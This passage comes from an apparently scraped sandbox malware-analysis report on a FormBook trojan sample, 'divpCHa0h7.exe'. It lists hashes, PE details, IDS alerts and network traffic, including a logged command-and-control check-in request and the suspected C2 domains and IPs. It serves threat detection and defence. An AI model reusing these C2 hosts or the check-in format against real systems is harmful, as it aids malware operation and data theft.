                                            http://www.jiyu-kobo.co.jp/jp/divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fonts.comXdivpCHa0h7.exe, 00000001.00000003.246654381.00000000059FB000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.comldivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cndivpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/frere-jones.htmldivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.jiyu-kobo.co.jp/tdivpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/odivpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sajatypeworks.coma-ddivpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/ridivpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fontbureau.com/designers8divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                                  		high

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  104.165.34.6
                                                  		www.sanlifalan.comUnited States
                                                  		18779EGIHOSTINGUStrue
                                                  108.167.135.122
                                                  		websites076.homestead.comUnited States
                                                  		46606UNIFIEDLAYER-AS-1USfalse
                                                  23.227.38.74
                                                  		shops.myshopify.comCanada
                                                  		13335CLOUDFLARENETUSfalse
                                                  81.169.145.161
                                                  		floaterslaser.comGermany
                                                  		6724STRATOSTRATOAGDEfalse
                                                  64.190.62.111
                                                  		www.mambacustomboats.comUnited States
                                                  		11696NBS11696USfalse

                                                  General Information

                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                  Analysis ID:502315
                                                  Start date:13.10.2021
                                                  Start time:19:45:01
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 12m 55s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:divpCHa0h7.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:30
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@12/1@8/5
                                                  EGA Information:Failed
                                                  HDC Information:
                                                  • Successful, ratio: 11% (good quality ratio 9.7%)
                                                  • Quality average: 72%
                                                  • Quality standard deviation: 32.6%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 20.82.210.154, 204.79.197.200, 13.107.21.200, 95.100.218.79, 95.100.216.89, 2.20.178.33, 2.20.178.24, 40.112.88.60, 20.50.102.62
                                                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  19:46:07API Interceptor2x Sleep call for process: divpCHa0h7.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASN

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\divpCHa0h7.exe.log
                                                  Process:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1308
                                                  Entropy (8bit):5.348115897127242
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4KJXE4qpE4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKorE4x88:MIHKtH2HKXE1qHmAHKzvRYHKhQnoPtH2
                                                  MD5:832D6A22CE7798D72609B9C21B4AF152
                                                  SHA1:B086DE927BFEE6039F5555CE53C397D1E59B4CA4
                                                  SHA-256:9E5EE72EF293C66406AF155572BF3B0CF9DA09CC1F60ED6524AAFD65553CE551
                                                  SHA-512:A1A70F76B98C2478830AE737B4F12507D859365F046C5A415E1EBE3D87FFD2B64663A31E1E5142F7C3A7FE9A6A9CB8C143C2E16E94C3DD6041D1CCABEDDD2C21
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.476049309864918
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:divpCHa0h7.exe
                                                  File size:477696
                                                  MD5:fda0d823b262ac2b1bd76a2053c29692
                                                  SHA1:73f72d7c987d44d1f236c138c5617b527c5ba340
                                                  SHA256:91a166f9a29ad832c9640078210a47e5afa928ab1a79a7b40d3b358e9c8bc5d5
                                                  SHA512:230e3a12c58a61c2348463b5acb92a6b557419b79e0427882750caa84d3c7e8fcec92ff6151f4f22b6eb967da138c931ed56f0dedadf1af1ac5d809508e74507
                                                  SSDEEP:12288:AsXSBAmUT9BbRsXFkN8xDqT2LWWJOxTa:AsCBAme9Bb2Xq8xk2LWx
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa..............0.................. ........@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:c4b28ed696aa92c0

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x45d612
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0x6166C8DB [Wed Oct 13 11:54:03 2021 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5d5c00x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5e0000x18ca4.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x780000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x5b6180x5b800False0.880715292008data7.77424395601IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x5e0000x18ca40x18e00False0.195381202889data5.07070154334IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x780000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_ICON0x5e1800x468GLS_BINARY_LSB_FIRST
                                                  RT_ICON0x5e5f80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                                  RT_ICON0x5f6b00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                  RT_ICON0x61c680x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                  RT_ICON0x65ea00x10828dBase III DBT, version number 0, next free block index 40
                                                  RT_GROUP_ICON0x766d80x4cdata
                                                  RT_VERSION0x767340x370data
                                                  RT_MANIFEST0x76ab40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Version Infos

                                                  DescriptionData
                                                  Translation0x0000 0x04b0
                                                  LegalCopyrightCopyright Gottschalks 2011
                                                  Assembly Version1.0.0.0
                                                  InternalNameDateTimeFormatFla.exe
                                                  FileVersion1.0.0.0
                                                  CompanyNameGottschalks
                                                  LegalTrademarks
                                                  Comments
                                                  ProductNameMapEditor1
                                                  ProductVersion1.0.0.0
                                                  FileDescriptionMapEditor1
                                                  OriginalFilenameDateTimeFormatFla.exe

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  10/13/21-19:47:34.244388TCP1201ATTACK-RESPONSES 403 Forbidden804976723.227.38.74192.168.2.5
                                                  10/13/21-19:47:40.620774ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8
                                                  10/13/21-19:47:40.694370TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.5104.165.34.6
                                                  10/13/21-19:47:40.694370TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.5104.165.34.6
                                                  10/13/21-19:47:40.694370TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.5104.165.34.6
                                                  10/13/21-19:48:01.554977TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978980192.168.2.5108.167.135.122
                                                  10/13/21-19:48:01.554977TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978980192.168.2.5108.167.135.122
                                                  10/13/21-19:48:01.554977TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978980192.168.2.5108.167.135.122
                                                  10/13/21-19:48:12.861304TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981280192.168.2.58.212.24.67
                                                  10/13/21-19:48:12.861304TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981280192.168.2.58.212.24.67
                                                  10/13/21-19:48:12.861304TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981280192.168.2.58.212.24.67

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 13, 2021 19:47:34.178965092 CEST4976780192.168.2.523.227.38.74
                                                  Oct 13, 2021 19:47:34.196883917 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.197135925 CEST4976780192.168.2.523.227.38.74
                                                  Oct 13, 2021 19:47:34.197210073 CEST4976780192.168.2.523.227.38.74
                                                  Oct 13, 2021 19:47:34.213325977 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244388103 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244424105 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244447947 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244472980 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244493961 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244508982 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244515896 CEST4976780192.168.2.523.227.38.74
                                                  Oct 13, 2021 19:47:34.244524002 CEST804976723.227.38.74192.168.2.5
                                                  Oct 13, 2021 19:47:34.244680882 CEST4976780192.168.2.523.227.38.74
                                                  Oct 13, 2021 19:47:34.244837999 CEST4976780192.168.2.523.227.38.74
                                                  Oct 13, 2021 19:47:40.524382114 CEST4976880192.168.2.5104.165.34.6
                                                  Oct 13, 2021 19:47:40.694076061 CEST8049768104.165.34.6192.168.2.5
                                                  Oct 13, 2021 19:47:40.694190025 CEST4976880192.168.2.5104.165.34.6
                                                  Oct 13, 2021 19:47:40.694370031 CEST4976880192.168.2.5104.165.34.6
                                                  Oct 13, 2021 19:47:40.867327929 CEST8049768104.165.34.6192.168.2.5
                                                  Oct 13, 2021 19:47:40.867357969 CEST8049768104.165.34.6192.168.2.5
                                                  Oct 13, 2021 19:47:40.867674112 CEST4976880192.168.2.5104.165.34.6
                                                  Oct 13, 2021 19:47:40.867718935 CEST4976880192.168.2.5104.165.34.6
                                                  Oct 13, 2021 19:47:41.038270950 CEST8049768104.165.34.6192.168.2.5
                                                  Oct 13, 2021 19:47:45.901201963 CEST4976980192.168.2.581.169.145.161
                                                  Oct 13, 2021 19:47:45.919284105 CEST804976981.169.145.161192.168.2.5
                                                  Oct 13, 2021 19:47:45.919430017 CEST4976980192.168.2.581.169.145.161
                                                  Oct 13, 2021 19:47:45.919836998 CEST4976980192.168.2.581.169.145.161
                                                  Oct 13, 2021 19:47:45.938008070 CEST804976981.169.145.161192.168.2.5
                                                  Oct 13, 2021 19:47:45.938915014 CEST804976981.169.145.161192.168.2.5
                                                  Oct 13, 2021 19:47:45.938937902 CEST804976981.169.145.161192.168.2.5
                                                  Oct 13, 2021 19:47:45.939183950 CEST4976980192.168.2.581.169.145.161
                                                  Oct 13, 2021 19:47:45.939256907 CEST4976980192.168.2.581.169.145.161
                                                  Oct 13, 2021 19:47:45.959599018 CEST804976981.169.145.161192.168.2.5
                                                  Oct 13, 2021 19:47:51.185455084 CEST4977380192.168.2.564.190.62.111
                                                  Oct 13, 2021 19:47:51.203566074 CEST804977364.190.62.111192.168.2.5
                                                  Oct 13, 2021 19:47:51.203690052 CEST4977380192.168.2.564.190.62.111
                                                  Oct 13, 2021 19:47:51.203907013 CEST4977380192.168.2.564.190.62.111
                                                  Oct 13, 2021 19:47:51.221406937 CEST804977364.190.62.111192.168.2.5
                                                  Oct 13, 2021 19:47:51.249383926 CEST804977364.190.62.111192.168.2.5
                                                  Oct 13, 2021 19:47:51.249403954 CEST804977364.190.62.111192.168.2.5
                                                  Oct 13, 2021 19:47:51.249562025 CEST4977380192.168.2.564.190.62.111
                                                  Oct 13, 2021 19:47:51.249701023 CEST4977380192.168.2.564.190.62.111
                                                  Oct 13, 2021 19:47:51.267669916 CEST804977364.190.62.111192.168.2.5
                                                  Oct 13, 2021 19:48:01.420226097 CEST4978980192.168.2.5108.167.135.122
                                                  Oct 13, 2021 19:48:01.553453922 CEST8049789108.167.135.122192.168.2.5
                                                  Oct 13, 2021 19:48:01.553663969 CEST4978980192.168.2.5108.167.135.122
                                                  Oct 13, 2021 19:48:01.554976940 CEST4978980192.168.2.5108.167.135.122
                                                  Oct 13, 2021 19:48:01.689186096 CEST8049789108.167.135.122192.168.2.5
                                                  Oct 13, 2021 19:48:01.689218998 CEST8049789108.167.135.122192.168.2.5
                                                  Oct 13, 2021 19:48:01.689506054 CEST4978980192.168.2.5108.167.135.122
                                                  Oct 13, 2021 19:48:01.689524889 CEST4978980192.168.2.5108.167.135.122
                                                  Oct 13, 2021 19:48:01.822371960 CEST8049789108.167.135.122192.168.2.5

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 13, 2021 19:47:34.126564980 CEST5244153192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:47:34.165796995 CEST53524418.8.8.8192.168.2.5
                                                  Oct 13, 2021 19:47:39.315068960 CEST6217653192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:47:40.339004993 CEST6217653192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:47:40.522993088 CEST53621768.8.8.8192.168.2.5
                                                  Oct 13, 2021 19:47:40.620671988 CEST53621768.8.8.8192.168.2.5
                                                  Oct 13, 2021 19:47:45.876126051 CEST5959653192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:47:45.900255919 CEST53595968.8.8.8192.168.2.5
                                                  Oct 13, 2021 19:47:50.995863914 CEST6318353192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:47:51.184072018 CEST53631838.8.8.8192.168.2.5
                                                  Oct 13, 2021 19:48:01.289443970 CEST5696953192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:48:01.419078112 CEST53569698.8.8.8192.168.2.5
                                                  Oct 13, 2021 19:48:06.706549883 CEST5475753192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:48:07.117193937 CEST53547578.8.8.8192.168.2.5
                                                  Oct 13, 2021 19:48:12.124536991 CEST4999253192.168.2.58.8.8.8
                                                  Oct 13, 2021 19:48:12.523261070 CEST53499928.8.8.8192.168.2.5

                                                  ICMP Packets

                                                  TimestampSource IPDest IPChecksumCodeType
                                                  Oct 13, 2021 19:47:40.620774031 CEST192.168.2.58.8.8.8d007(Port unreachable)Destination Unreachable

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Oct 13, 2021 19:47:34.126564980 CEST192.168.2.58.8.8.80xa732Standard query (0)www.ribbonofficial.comA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:39.315068960 CEST192.168.2.58.8.8.80x470Standard query (0)www.sanlifalan.comA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:40.339004993 CEST192.168.2.58.8.8.80x470Standard query (0)www.sanlifalan.comA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:45.876126051 CEST192.168.2.58.8.8.80x72c7Standard query (0)www.floaterslaser.comA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:50.995863914 CEST192.168.2.58.8.8.80xfc77Standard query (0)www.mambacustomboats.comA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:48:01.289443970 CEST192.168.2.58.8.8.80x3effStandard query (0)www.esyscoloradosprings.comA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:48:06.706549883 CEST192.168.2.58.8.8.80xa9c5Standard query (0)www.begukiu0.infoA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:48:12.124536991 CEST192.168.2.58.8.8.80x6a9bStandard query (0)www.kangrungao.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Oct 13, 2021 19:47:34.165796995 CEST8.8.8.8192.168.2.50xa732No error (0)www.ribbonofficial.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                  Oct 13, 2021 19:47:34.165796995 CEST8.8.8.8192.168.2.50xa732No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:40.522993088 CEST8.8.8.8192.168.2.50x470No error (0)www.sanlifalan.com104.165.34.6A (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:40.620671988 CEST8.8.8.8192.168.2.50x470No error (0)www.sanlifalan.com104.165.34.6A (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:45.900255919 CEST8.8.8.8192.168.2.50x72c7No error (0)www.floaterslaser.comfloaterslaser.comCNAME (Canonical name)IN (0x0001)
                                                  Oct 13, 2021 19:47:45.900255919 CEST8.8.8.8192.168.2.50x72c7No error (0)floaterslaser.com81.169.145.161A (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:47:51.184072018 CEST8.8.8.8192.168.2.50xfc77No error (0)www.mambacustomboats.com64.190.62.111A (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:48:01.419078112 CEST8.8.8.8192.168.2.50x3effNo error (0)www.esyscoloradosprings.comwebsites076.homestead.comCNAME (Canonical name)IN (0x0001)
                                                  Oct 13, 2021 19:48:01.419078112 CEST8.8.8.8192.168.2.50x3effNo error (0)websites076.homestead.com108.167.135.122A (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:48:07.117193937 CEST8.8.8.8192.168.2.50xa9c5Name error (3)www.begukiu0.infononenoneA (IP address)IN (0x0001)
                                                  Oct 13, 2021 19:48:12.523261070 CEST8.8.8.8192.168.2.50x6a9bNo error (0)www.kangrungao.coma.mb.cnCNAME (Canonical name)IN (0x0001)
                                                  Oct 13, 2021 19:48:12.523261070 CEST8.8.8.8192.168.2.50x6a9bNo error (0)a.mb.cn8.212.24.67A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.ribbonofficial.com
                                                  • www.sanlifalan.com
                                                  • www.floaterslaser.com
                                                  • www.mambacustomboats.com
                                                  • www.esyscoloradosprings.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.54976723.227.38.7480C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 13, 2021 19:47:34.197210073 CEST5785OUTGET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1
                                                  Host: www.ribbonofficial.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Oct 13, 2021 19:47:34.244388103 CEST5786INHTTP/1.1 403 Forbidden
                                                  Date: Wed, 13 Oct 2021 17:47:34 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Sorting-Hat-PodId: 216
                                                  X-Sorting-Hat-ShopId: 59389116584
                                                  X-Dc: gcp-europe-west1
                                                  X-Request-ID: cecbddb8-e852-4c90-927e-af3e5555f963
                                                  X-Content-Type-Options: nosniff
                                                  X-Permitted-Cross-Domain-Policies: none
                                                  X-XSS-Protection: 1; mode=block
                                                  X-Download-Options: noopen
                                                  CF-Cache-Status: DYNAMIC
                                                  Server: cloudflare
